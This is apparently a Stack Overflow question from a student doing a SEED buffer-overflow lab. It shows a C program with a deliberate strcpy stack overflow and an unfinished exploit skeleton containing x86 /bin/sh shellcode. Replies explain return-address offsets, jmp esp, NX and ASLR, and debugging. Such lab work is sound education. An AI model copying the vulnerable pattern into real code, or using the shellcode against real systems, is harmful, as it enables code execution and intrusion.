# Exploiting a BufferOverflow

Tags: c, linux

I'm working on a project in which I'm supposed to write a C program to exploit the vulnerability of a given program.

Here is the vulnerable C program:

```
#include <stdlib.h>
#include <stdio.h>

int bof(char *str)
{
  char buffer[12];
  strcpy(buffer, str);
  return 1;
}

int main(int argc, char **argv)
{
  char str[517];
  FILE *badfile;
  badfile = fopen("badfile", "r");
  fread(str, sizeof(char), 517, badfile);
  bof(str);
  printf("Returned Properly\n");
  return 1;
}
```

And here is the code for exploit:

```
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
"\x31\xc0"  /* xorl  %eax,%eax   */
"\x50"      /* pushl %eax        */
"\x68""//sh"/* pushl $0x68732f2f */
"\x68""/bin"/* pushl $0x6e69622f */
"\x89\xe3"  /* movl  %esp,%ebx   */
"\x50"      /* pushl %eax        */
"\x53"      /* pushl %ebx        */
"\x89\xe1"  /* movl  %esp,%ecx   */
"\x99"      /* cdql              */
"\xb0\x0b"  /* movb  $0x0b,%al   */
"\xcd\x80"  /* int   $0x80       */
;

void main(int argc, char **argv)
{
   char buffer[517];
   FILE *badfile;

   /* Initialize buffer with 0x90 (NOP instruction) */
   memset(&buffer, 0x90, 517);

   /* Fill the buffer with appropriate contents here */

   /* Save the contents to the file "badfile" */
   badfile = fopen("./badfile", "w");
   fwrite(buffer, 517, 1, badfile);
   fclose(badfile);
}
```

So, I need to fill the buffer with appropriate contents before saving to the "badfile". I've read a lot about buffer overflows and I guess I need to modify the return address of the vulnerable program. But I really don't know how I'm supposed to do it.
Shall I first find the original return address or is there something else that I can do?
Also, any ideas/suggestions about how I'm supposed to implement the buffer?

Comment: Just thought I'd post the link to [the project](http://www.cis.syr.edu/~wedu/seed/Labs/Vulnerability/Buffer_Overflow/).

Comment: You need to figure out the offset of the buffer which will end up overwriting the saved return pointer, then tweak the value at that offset to point to an instruction which will end up executing the rest of the buffer (like a `jmp esp`).

Comment: If the project is for [school](http://meta.stackexchange.com/q/10811/133817), mention so explicitly.  Questions on SO should be more directed towards your own code than this one is (see the link for details); if you're not even sure where to start, it would be better to ask your teacher or TA. That's something they should have covered in class, or in your material.

Comment: @outis: I think it's safe to give the OP the benefit of the doubt and not assume it's necessarily for homework... I myself had to do this very lab about a couple of weeks ago for something unrelated to any assignments/classes/grades (but nevertheless school-related).

Comment: Well, thanks for reminding but I had no intention to hide, it is for school. I've tried something likethis;                               #define offset 1500

unsigned long get_ESP(void){
     __asm__("movl %ESP,%EAX");
}                                                                        buffer[9] = addr & 0x000000ff;
    buffer[10] = addr & 0x0000ff00;
    buffer[11] = addr & 0x00ff0000;
    buffer[12] = addr & 0xff000000; but it is not working

Comment: Attach a debugger. Look for the nop slide in the memory dump. Adjust pointer.

Comment: @ozgen: You definitely want to run this in a debugger to actually see what's happening. Shooting into the blue like that is not the way to go.

Comment: I highly recommend "The Shellcoder's Handbook" by Anley, Heasman, Linder and Richarte as a resource for figuring out this kind of problem. Not a great answer, but it's a large subject.

Comment: @ozgen: indeed - run this in a debugger, dump the stack (gdb: `x/40gx $esp` in 32bit) at entry and exit to the "overflowing" function `bof()` to see what changed. It may not be as easy to exploit as "textbook" says because the shellcode you gave will not work if the stack is NX-protected (not executable). The strategy of deflecting to `execve()` might still work but requires changing the shellcode; if your Linux kernel uses ASLR (address space layout randomization) it's guessing and requires multiple runs to make the exploit work,or using "spraying". Googling the terms might help - good luck.

Answer (score 1, accepted):

I suggest reading the pages on Metasploit Unleashed, starting with [this one](http://www.offensive-security.com/metasploit-unleashed/Writing_An_Exploit). You can go through the associated ruby modules, to see what is actually going on, and port to C. While non trivial, it demonstrates the methods needed.

Also as others have suggested, using a debugger is important to figure out what is going on. Getting a decent one, such as [cgdb](http://cgdb.sourceforge.net/), [ddd](http://www.gnu.org/software/ddd/), [pyclewn](http://pyclewn.sourceforge.net/), or [gdb-mode](http://www.linuxjournal.com/article/7876), will make life much easier.